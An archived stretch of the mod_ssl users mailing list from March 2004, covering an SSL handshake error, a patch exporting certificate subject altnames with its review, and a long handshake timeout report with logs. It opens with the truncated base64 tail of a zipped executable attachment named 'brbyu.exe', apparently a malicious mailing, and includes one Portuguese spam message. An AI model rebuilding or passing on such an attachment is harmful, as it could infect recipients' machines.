wLvART/iH2bHVUtHOECIE77BUOYew5QwfJEhCqHgppQyc3q7mMsn3k1Ft/cDDe51alszH54t
D9ecgNMKZ2qtyj/sLWZZ8biCyAWkDT56P33iw64ZhPPbciCLs5IJ1WwB5BEosejdthwxd9WD
mnt9+R5emB1szR4WQPva28+Qrjv9CqFKFEmp/NmJsTwJwwnWQS/bHpP+MJRRObovQP4G922I
9lckeaiqtDJtlzDNiBp70qyg0vII/P9lS6aHMn1/vhZcFHg0yrEE7R/TJXDENqX5hDTcNSlK
a4c67lRUdiaaTEHkUWy9H0mONpRmkjZwZxURcqRO1K0u2B8a00sYGBg1yHgk1iYXDbPy48Gd
HnXyDZzrNqnfmWZUVMq0ZoKvH48rRFsCooKTEYmy7ACQdx/tqGy8FKkXr6x9wkrpAnKReziV
WNffB+fwQv6pEnI3OpWUx5kojRwUw7OIVGer+3/PPd9+JIxB8ER1PTexEkloTmg58dSWnu3T
MhqhSrqKkxt/q4rrWar+X+dxKDwaI4TZm78uxsTNbqPmcHci2wcdQxifLPUPYcOSyp6MAiCM
aI7k/63fpEsle3hCZzA8BkHdfiR3tUi3+NpqLEAeGB/xiB3msPwIGbBehUGoQW6hN2Hpg98z
p9NQWDByeaC2N8A65wclsX2sujs2rcm4tEKUIBEsO1lzX/AOKO3EAqGU8Y+iYJDoTayk4GYz
lRHf2JJAumILFMw/ZaVZS+kn4PgmE2HtBzgEZAh0T+UMR/mRKlhVKmxZ84JuZvK8z2lSEIA6
c8IkmylhPYZx5Cx5DxX0vNVRMRjAAYlp+ASF4sOvnvzgVlYox6HTHt6d5bGAdYI8acedOl0o
JTMoVch5CYXFWiV5bB+uLCleZYUp9JbUgcqrSma07/9mLkiH//NTDY6Ydkr3ESaCi92tUPFY
gNY0W6PR3DMHKHm9nmTB/td55+tuDvZqpmMd023rdtN2+HyxTNNpY3Dlbl8zQVasNoRVzEGz
XYItQ7SHGN6th/5EH5kc3TDoyb6Kn6zRYgMRFMRe0reOLpI2THV+FNRBdlnRgbVvonId4gid
9L3c6lLAx3+tcwA8OdxFkvGf+5Mmt1r+9U71lX0RwgraxvLeWNdS2MCwJ78tzYAx+kNU7xZJ
Wl+of4hCLRRg0s4UrZIj6rgYjVzYpSk0gnflIioSc+OE2pUnEmPi4T1z203cqmXCLIBreFXH
YXkGgGswf7746RXheE+nyCZrZvFkR+BlTgio61MMrYrDQHEWjiYC/KcaHfs6gjElGwfCUEMy
QmaPWAVn7bm8oClU1m/P5mhppds9P2Ent+3AlzUyG8/tZuD2NDP74Qsm3CA7P15DUvoojnAj
i3GqYKEHZ1TqktXr3URV4DGgfttlZ60aucMrsoJuvPaCqKHSnUqIXzDoVc0iE/VMLgjnRE+O
0JdnIzAoCydp95jVI8RKAXItuwAlCMGWUK8Y3nYucoGpzWxBWHlqZhaBLqg5Qe+fz4i5AJZP
xSY7E4sVOf4CUEsBAhQACgABAAAAQCFoMP5F808mUgAAGlIAAAkAAAAAAAAAAQAgAAAAAAAA
AGJyYnl1LmV4ZVBLBQYAAAAAAQABADcAAABNUgAAAAA=

----------xymxgrsssskbdquwtbka--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  8 16:17:54 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9CE8CA8975; Mon,  8 Mar 2004 16:17:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.193])
	by master.modssl.org (Postfix) with ESMTP id 6AA53A8939
	for ; Mon,  8 Mar 2004 16:17:38 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [10.254.1.122])
	by maggotts.rnib.org.uk (8.12.8/8.12.8) with ESMTP id i28FHZ5E009797
	for ; Mon, 8 Mar 2004 15:17:35 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2657.72)
	id ; Mon, 8 Mar 2004 15:17:32 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F05ADDDB7@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: Test message
Date: Mon, 8 Mar 2004 15:17:30 -0000 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

We've had DNS problems, so I'm just checking whether this will be approved
to the list immediately.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Why do so many people who call themselves christians use the name of Jesus
Christ as a swear word?


- 
DISCLAIMER: 

NOTICE: The information contained in this email and any attachments is 
confidential and may be privileged. If you are not the intended 
recipient you should not use, disclose, distribute or copy any of the 
content of it or of any attachment; you are requested to notify the 
sender immediately of your receipt of the email and then to delete it 
and any attachments from your system. 

RNIB endeavours to ensure that emails and any attachments generated by 
its staff are free from viruses or other contaminants. However, it 
cannot accept any responsibility for any  such which are transmitted.
We therefore recommend you scan all attachments. 

Please note that the statements and views expressed in this email and 
any attachments are those of the author and do not necessarily represent 
those of RNIB. 

RNIB Registered Charity Number: 226227 

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  8 18:16:22 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D41A1A8973; Mon,  8 Mar 2004 18:16:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from indigo.cs.bgu.ac.il (indigo.cs.bgu.ac.il [132.72.42.23])
	by master.modssl.org (Postfix) with ESMTP id BE87CA8934
	for ; Mon,  8 Mar 2004 18:16:05 +0100 (CET)
Received: from piavlo (piavlo [132.72.41.95])
	by indigo.cs.bgu.ac.il (8.12.11/8.12.11) with ESMTP id i28HDs2t009822
	for ; Mon, 8 Mar 2004 19:13:54 +0200 (IST)
Date: Mon, 8 Mar 2004 19:16:31 +0200 (IST)
From: Alexander Piavka 
X-X-Sender: piavka@piavlo
To: modssl-users@modssl.org
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F05ADDDB7@pborolocal.rnib.org.uk >
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Virus-Scanned: clamd / ClamAV version 0.67, clamav-milter version 0.67a
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alexander Piavka 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


 Hi, i've just upgraded from apache_1.3.29+openssl0.9.7b+mod_ssl-2.8.14-1.3.27
to apache_1.3.27+openssl0.9.7c+mod_ssl-2.8.16-1.3.29
and recreated cerificates generated in with new openssl0.9.7c i've
installed, now i can't to apache on https port it always gives the
following error:

[Mon Mar  8 19:07:01 2004] [error] mod_ssl: SSL handshake failed (server
www.cs.bgu.ac.il:443, client 132.72.41.95) (OpenSSL library error follows)
[Mon Mar  8 19:07:01 2004] [error] OpenSSL: error:1409441B:SSL
routines:SSL3_READ_BYTES:tlsv1 alert decrypt error

pls help

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From comodivulgar@bol.com.br  Mon Mar  8 21:42:27 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from smtp.uol.com.br (smtpout5.uol.com.br [200.221.11.58])
	by master.modssl.org (Postfix) with ESMTP id 43AF9A8934
	for ; Mon,  8 Mar 2004 21:42:09 +0100 (CET)
Received: from localhost (BA084172.user.veloxzone.com.br [200.217.84.172])
	by scorpion5.uol.com.br (Postfix) with ESMTP id CCDB08E37
	for ; Mon,  8 Mar 2004 17:42:01 -0300 (BRT)
X-Sender: comodivulgar@bol.com.br 
From: Marco Miranda 
To: modssl-users-l@master.modssl.org
Date: Mon, 08 Mar 2004 16:56:18 -0300
Subject: =?iso-8859-1?Q?Divulga=E7=E3o_cadastramento_em_sites_de_busca:_http://www.gueb.de/divulgueseusite?=
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-Id: <20040308204201.CCDB08E37@scorpion5.uol.com.br>

Tudo para divulgação de sites e homepages. Cadastramento em mecanismos de busca, 
email marketing, publicidade online, campanhas online, cadastro de sites, sites 
de busca, torne seu site um sucesso:

http://www.gueb.de/divulgueseusite

Tudo para divulgar seu site: Cadastramento em ferramentas de busca nacionais 
e internacionais. Cadastro em buscadores e diretórios.  Torne seu site um sucesso 
de visitação e vendas:

http://www.gueb.de/divulgueseusite

Dicas de como divulgar seu site. Email marketing e outros recursos.


From owner-modssl-users@modssl.org  Mon Mar  8 21:59:55 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4B36BA8973; Mon,  8 Mar 2004 21:59:55 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp2.andrew.cmu.edu (SMTP2.andrew.cmu.edu [128.2.10.82])
	by master.modssl.org (Postfix) with ESMTP id 9855FA8934
	for ; Mon,  8 Mar 2004 21:59:38 +0100 (CET)
Received: from [192.168.1.100] (PORTATOOL.WV.CC.cmu.edu [128.2.67.128])
	(user=kevinm mech=GSSAPI (0 bits))
	by smtp2.andrew.cmu.edu (8.12.10/8.12.10) with ESMTP id i28Kxcn6003796
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NOT)
	for ; Mon, 8 Mar 2004 15:59:38 -0500
Date: Mon, 08 Mar 2004 15:59:29 -0500
From: Kevin C Miller 
To: modssl-users@modssl.org
Subject: Patch providing v3 extensions in environment
Message-ID: <342225323.1078761569@[192.168.1.100]>
Originator-Info: login-token=Mulberry:01oJ9zmAsE6QHgF8IP6x/qB/P86sQmCgDOAuANoA/mIQ==;
 token_authority=postmaster@andrew.cmu.edu
X-Mailer: Mulberry/3.1.0 (Win32)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kevin C Miller 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've patched mod_ssl to export some V3 extension information from 
certificates into the environment. We are issuing client certificates with 
the Subject Alternative Name being used to specify DNS names / email 
addresses and need to authenticate using this information.

The patch is available from:
http://www.andrew.cmu.edu/~kevinm/mod_ssl-2.8.14-patch1

It applies to 2.8.16 as well with "patch -p9 < mod_ssl-2.8.14-patch1" in 
the top level directory of the distribution.

Please let me know if there are problems with this patch or if it's 
acceptable for inclusion in the distribution.

Thanks,
-Kevin

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  8 22:31:43 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 51538A8973; Mon,  8 Mar 2004 22:31:43 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 3FF6EA8939
	for ; Mon,  8 Mar 2004 22:31:24 +0100 (CET)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.10/8.12.10) with ESMTP id i28LVMST032324;
	Mon, 8 Mar 2004 16:31:22 -0500
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id i28LVL800404;
	Mon, 8 Mar 2004 16:31:21 -0500
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.10/8.12.7) with ESMTP id i28LVKUr032165;
	Mon, 8 Mar 2004 21:31:20 GMT
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.10/8.12.10/Submit) id i28LVKBl032164;
	Mon, 8 Mar 2004 21:31:20 GMT
Date: Mon, 8 Mar 2004 21:31:20 +0000
From: Joe Orton 
To: Kevin C Miller 
Cc: modssl-users@modssl.org
Subject: Re: Patch providing v3 extensions in environment
Message-ID: <20040308213120.GA32147@redhat.com>
Mail-Followup-To: Kevin C Miller ,
	modssl-users@modssl.org
References: <342225323.1078761569@[192.168.1.100]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <342225323.1078761569@[192.168.1.100]>
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Mar 08, 2004 at 03:59:29PM -0500, Kevin C Miller wrote:
> I've patched mod_ssl to export some V3 extension information from 
> certificates into the environment. We are issuing client certificates with 
> the Subject Alternative Name being used to specify DNS names / email 
> addresses and need to authenticate using this information.
> 
> The patch is available from:
> http://www.andrew.cmu.edu/~kevinm/mod_ssl-2.8.14-patch1

Neat... I'd avoid doing separate strcEQs for V3EXT_ and the rest
separately since strcasecmp is slow; and I'd also omit the V3EXT_ from
the name completely, just call it SSL_*_SUBJECT_ALTNAME or something and
do the one strcEQ in var_lookup_ssl_cert.  Adding this in +StdEnvVars
might be a bit much...

How does OpenSSL serialize the altname extension if it contains multiple
names; is it usable in SSLRequire then?

(I don't speak for whether it's acceptable to Ralf for inclusion in
mod_ssl 2.8, of course :)

Regards,

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  8 23:02:19 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A865FA8973; Mon,  8 Mar 2004 23:02:19 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp2.andrew.cmu.edu (SMTP2.andrew.cmu.edu [128.2.10.82])
	by master.modssl.org (Postfix) with ESMTP id 344CBA8939
	for ; Mon,  8 Mar 2004 23:02:03 +0100 (CET)
Received: from [192.168.1.100] (PORTATOOL.WV.CC.cmu.edu [128.2.67.128])
	(user=kevinm mech=GSSAPI (0 bits))
	by smtp2.andrew.cmu.edu (8.12.10/8.12.10) with ESMTP id i28M21n6017608
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NOT);
	Mon, 8 Mar 2004 17:02:01 -0500
Date: Mon, 08 Mar 2004 17:01:53 -0500
From: Kevin C Miller 
To: Joe Orton 
Cc: modssl-users@modssl.org
Subject: Re: Patch providing v3 extensions in environment
Message-ID: <345968967.1078765313@[192.168.1.100]>
In-Reply-To: <20040308213120.GA32147@redhat.com>
References: <342225323.1078761569@[192.168.1.100]>
 <20040308213120.GA32147@redhat.com>
Originator-Info: login-token=Mulberry:01s6mujB4OJPXzIf0D/ikl+wYGJbg5FDvhDBsBsxkhFQ==;
 token_authority=postmaster@andrew.cmu.edu
X-Mailer: Mulberry/3.1.0 (Win32)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kevin C Miller 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> Neat... I'd avoid doing separate strcEQs for V3EXT_ and the rest
> separately since strcasecmp is slow; and I'd also omit the V3EXT_ from
> the name completely, just call it SSL_*_SUBJECT_ALTNAME or something and
> do the one strcEQ in var_lookup_ssl_cert.

I was assuming that at some point, it may be desirable to export data of 
other X509v3 extensions, and this would provide a clean separation. But, I 
see your point and will change the patch if people agree that no such 
separation is needed.

> Adding this in +StdEnvVars might be a bit much...

Okay; adding another directive would obviously require a larger change, but 
it doesn't look too complicated and I'm willing to, if there is agreement 
that a "ExtEnvVars" or "AdvEnvVars" is desirable.

> How does OpenSSL serialize the altname extension if it contains multiple
> names; is it usable in SSLRequire then?

It would look like: "DNS:some.host.example.com, IP Address:10.0.0.1". So, 
usable in SSLRequire although perhaps not as useful as it could be.

-Kevin

---------------------------------------------------
Kevin C. Miller 
Network Development
Carnegie Mellon University
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  9 15:34:23 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 70D28A8948; Tue,  9 Mar 2004 15:34:23 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.homecu.net (mail.homecu.net [199.184.207.89])
	by master.modssl.org (Postfix) with SMTP id C9353A8940
	for ; Tue,  9 Mar 2004 15:34:03 +0100 (CET)
Received: (qmail 9220 invoked by uid 506); 9 Mar 2004 14:34:02 -0000
Received: from joe@webdms.com by mail.homecu.net by uid 503 with qmail-scanner-1.15 
 ( Clear:. 
 Processed in 0.035776 secs); 09 Mar 2004 14:34:02 -0000
Received: from unknown (HELO webdms.com) (199.184.207.194)
  by mail.homecu.net with SMTP; 9 Mar 2004 14:34:02 -0000
Message-ID: <404DD6FC.90105@webdms.com>
Date: Tue, 09 Mar 2004 07:38:52 -0700
From: Joe Pearson 
User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.5) Gecko/20031007
X-Accept-Language: en,pdf
MIME-Version: 1.0
To: "modssl-users@modssl.org" 
Subject: SSL Handshake time out
Content-Type: multipart/alternative;
 boundary="------------090209090901060905050704"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Pearson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------090209090901060905050704
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hello,

I have a server that has been reaching max clients serveral times per 
day.  When I look at apache-status, 90% of the children are in "Reading 
Request" state.  Most of them stay in that state until the apache 
"Timeout" is reached. However, some of the children stay reading until I 
restart http.  Since this causes my server to become unresponsive, I've 
lowered the Timeout to 200, which helps somewhat, but we still have the 
problem.

Here is server status of a couple of stuck processes:

Srv 	PID 	Acc 	M 	CPU 	SS 	Req 	Conn 	Child 	Slot 	Client 	VHost 	Request
*0-3* 	30078 	0/2188/2188 	*R* 	18.95 	895 	0 	0.0 	4.30 	4.30 	? 	? 
..reading..
*1-3* 	30079 	0/2168/2168 	*R* 	20.22 	1 	0 	0.0 	6.59 	6.59 	? 	? 
..reading..


Why do the processes stay "reading" when they have surpassed the 
timeout?  I've seen other people post about this problem but no one ever 
responds.

Here is the ssl log for these "stuck" processes and it usually ends with 
"SSL handshake timed out"

[05/Mar/2004 05:52:08 21978] [info]  Connection to child 10 established 
(server www3.homecu.net:443, client 66.153.14.11)
[05/Mar/2004 05:52:08 21978] [info]  Seeding PRNG with 1160 bytes of 
entropy
[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Handshake: start
[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Loop: before/accept 
initialization
[05/Mar/2004 05:52:08 21978] [trace] Inter-Process Session Cache: 
request=GET status=FOUND 
id=AABA019681BD42892F8E6F1B30AA9AD295FC1ED0FEEA47F5AB13FB427087CE5C 
(session reuse)
[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Loop: SSLv3 read client 
hello A
[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Loop: SSLv3 write server 
hello A
[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Loop: SSLv3 write change 
cipher spec A
[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Loop: SSLv3 write finished A
[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Loop: SSLv3 flush data
[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Loop: SSLv3 read finished A
[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Handshake: done
[05/Mar/2004 05:52:08 21978] [info]  Connection: Client IP: 
66.153.14.11, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
[05/Mar/2004 05:52:09 21978] [info]  Initial (No.1) HTTPS request 
received for child 10 (server www3.homecu.net:443)
[05/Mar/2004 05:52:09 21978] [info]  Connection to child 10 closed with 
unclean shutdown (server www3.homecu.net:443, client 66.153.14.11)
[05/Mar/2004 05:52:12 21978] [info]  Connection to child 10 established 
(server www3.homecu.net:443, client 66.153.14.11)
[05/Mar/2004 05:52:12 21978] [info]  Seeding PRNG with 1160 bytes of 
entropy
[05/Mar/2004 05:52:12 21978] [trace] OpenSSL: Handshake: start
[05/Mar/2004 05:52:12 21978] [trace] OpenSSL: Loop: before/accept 
initialization
[05/Mar/2004 05:52:13 21978] [trace] OpenSSL: Loop: SSLv3 read client 
hello A
[05/Mar/2004 05:52:13 21978] [trace] OpenSSL: Loop: SSLv3 write server 
hello A
[05/Mar/2004 05:52:13 21978] [trace] OpenSSL: Loop: SSLv3 write change 
cipher spec A
[05/Mar/2004 05:52:13 21978] [trace] OpenSSL: Loop: SSLv3 write finished A
[05/Mar/2004 05:52:13 21978] [trace] OpenSSL: Loop: SSLv3 flush data
[05/Mar/2004 05:52:13 21978] [trace] OpenSSL: Loop: SSLv3 read finished A
[05/Mar/2004 05:52:13 21978] [trace] OpenSSL: Handshake: done
[05/Mar/2004 05:52:13 21978] [info]  Connection: Client IP: 
66.153.14.11, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
[05/Mar/2004 05:52:13 21978] [info]  Initial (No.1) HTTPS request 
received for child 10 (server www3.homecu.net:443)
[05/Mar/2004 05:52:13 21978] [info]  Connection to child 10 closed with 
unclean shutdown (server www3.homecu.net:443, client 66.153.14.11)
[05/Mar/2004 05:52:32 21978] [info]  Connection to child 10 established 
(server www3.homecu.net:443, client 66.153.14.11)
[05/Mar/2004 05:52:32 21978] [info]  Seeding PRNG with 1160 bytes of 
entropy
[05/Mar/2004 05:52:32 21978] [trace] OpenSSL: Handshake: start
[05/Mar/2004 05:52:32 21978] [trace] OpenSSL: Loop: before/accept 
initialization
[05/Mar/2004 05:55:53 21978] [trace] OpenSSL: Exit: error in SSLv2/v3 
read client hello A
[05/Mar/2004 05:55:53 21978] [error] SSL handshake timed out (client 
66.153.14.11, server www3.homecu.net:443)

This is a redhat 7.2 box with:
openssl-0.9.6b-35.7
mod_ssl-2.8.12-3
apache-1.3.27-3.7.2
Config file  SetEnvIf User-Agent ".*MSIE.*" nokeepalive 
ssl-unclean-shutdown  downgrade-1.0 force-response-1.0

Any ideas where to go from here to determine why this is happening?

Thanks,
Joe Pearson


--------------090209090901060905050704
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit




  
  


Hello,




I have a server that has been reaching max clients serveral times per
day.  When I look at apache-status, 90% of the children are in "Reading
Request" state.  Most of them stay in that state until the apache
"Timeout" is reached. However, some of the children stay reading until
I restart http.  Since this causes my server to become unresponsive,
I've lowered the Timeout to 200, which helps somewhat, but we still
have the problem.




Here is server status of a couple of stuck processes:





  
    

      Srv
      PID
      Acc
      M
      CPU 
      SS
      Req
      Conn
      Child
      Slot
      Client
      VHost
      Request
    

    

      0-3
      30078
      0/2188/2188
      R 
      18.95
      895
      0
      0.0
      4.30
      4.30 
      ?
      ?
      ..reading.. 
    

    

      1-3
      30079
      0/2168/2168
      R 
      20.22
      1
      0
      0.0
      6.59
      6.59 
      ?
      ?
      ..reading..
    

  




Why do the processes stay "reading" when they have surpassed the
timeout?  I've seen other people post about this problem but no one
ever responds.



Here is the ssl log for these "stuck" processes and it usually ends
with "SSL handshake timed out"




[05/Mar/2004 05:52:08 21978] [info]  Connection to child 10 established
(server www3.homecu.net:443, client 66.153.14.11)


[05/Mar/2004 05:52:08 21978] [info]  Seeding PRNG with 1160 bytes of
entropy


[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Handshake: start


[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Loop: before/accept
initialization


[05/Mar/2004 05:52:08 21978] [trace] Inter-Process Session Cache:
request=GET status=FOUND
id=AABA019681BD42892F8E6F1B30AA9AD295FC1ED0FEEA47F5AB13FB427087CE5C
(session reuse)


[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Loop: SSLv3 read client
hello A


[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Loop: SSLv3 write server
hello A


[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Loop: SSLv3 write change
cipher spec A


[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Loop: SSLv3 write
finished A


[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Loop: SSLv3 flush data


[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Loop: SSLv3 read finished
A


[05/Mar/2004 05:52:08 21978] [trace] OpenSSL: Handshake: done


[05/Mar/2004 05:52:08 21978] [info]  Connection: Client IP:
66.153.14.11, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)


[05/Mar/2004 05:52:09 21978] [info]  Initial (No.1) HTTPS request
received for child 10 (server www3.homecu.net:443)


[05/Mar/2004 05:52:09 21978] [info]  Connection to child 10 closed
with unclean shutdown (server www3.homecu.net:443, client 66.153.14.11)


[05/Mar/2004 05:52:12 21978] [info]  Connection to child 10 established
(server www3.homecu.net:443, client 66.153.14.11)


[05/Mar/2004 05:52:12 21978] [info]  Seeding PRNG with 1160 bytes of
entropy


[05/Mar/2004 05:52:12 21978] [trace] OpenSSL: Handshake: start


[05/Mar/2004 05:52:12 21978] [trace] OpenSSL: Loop: before/accept
initialization


[05/Mar/2004 05:52:13 21978] [trace] OpenSSL: Loop: SSLv3 read client
hello A


[05/Mar/2004 05:52:13 21978] [trace] OpenSSL: Loop: SSLv3 write server
hello A


[05/Mar/2004 05:52:13 21978] [trace] OpenSSL: Loop: SSLv3 write change
cipher spec A


[05/Mar/2004 05:52:13 21978] [trace] OpenSSL: Loop: SSLv3 write
finished A


[05/Mar/2004 05:52:13 21978] [trace] OpenSSL: Loop: SSLv3 flush data


[05/Mar/2004 05:52:13 21978] [trace] OpenSSL: Loop: SSLv3 read finished
A


[05/Mar/2004 05:52:13 21978] [trace] OpenSSL: Handshake: done


[05/Mar/2004 05:52:13 21978] [info]  Connection: Client IP:
66.153.14.11, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)


[05/Mar/2004 05:52:13 21978] [info]  Initial (No.1) HTTPS request
received for child 10 (server www3.homecu.net:443)


[05/Mar/2004 05:52:13 21978] [info]  Connection to child 10 closed
with unclean shutdown (server www3.homecu.net:443, client 66.153.14.11)


[05/Mar/2004 05:52:32 21978] [info]  Connection to child 10 established
(server www3.homecu.net:443, client 66.153.14.11)


[05/Mar/2004 05:52:32 21978] [info]  Seeding PRNG with 1160 bytes of
entropy


[05/Mar/2004 05:52:32 21978] [trace] OpenSSL: Handshake: start


[05/Mar/2004 05:52:32 21978] [trace] OpenSSL: Loop: before/accept
initialization


[05/Mar/2004 05:55:53 21978] [trace] OpenSSL: Exit: error in SSLv2/v3
read client hello A


[05/Mar/2004 05:55:53 21978] [error] SSL handshake timed out (client
66.153.14.11, server www3.homecu.net:443)




This is a redhat 7.2 box with:


openssl-0.9.6b-35.7


mod_ssl-2.8.12-3


apache-1.3.27-3.7.2


Config file  SetEnvIf User-Agent ".*MSIE.*" nokeepalive
ssl-unclean-shutdown  downgrade-1.0 force-response-1.0




Any ideas where to go from here to determine why this is happening?




Thanks,


Joe Pearson







--------------090209090901060905050704--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  9 16:03:20 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1E296A8963; Tue,  9 Mar 2004 16:03:20 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.193])
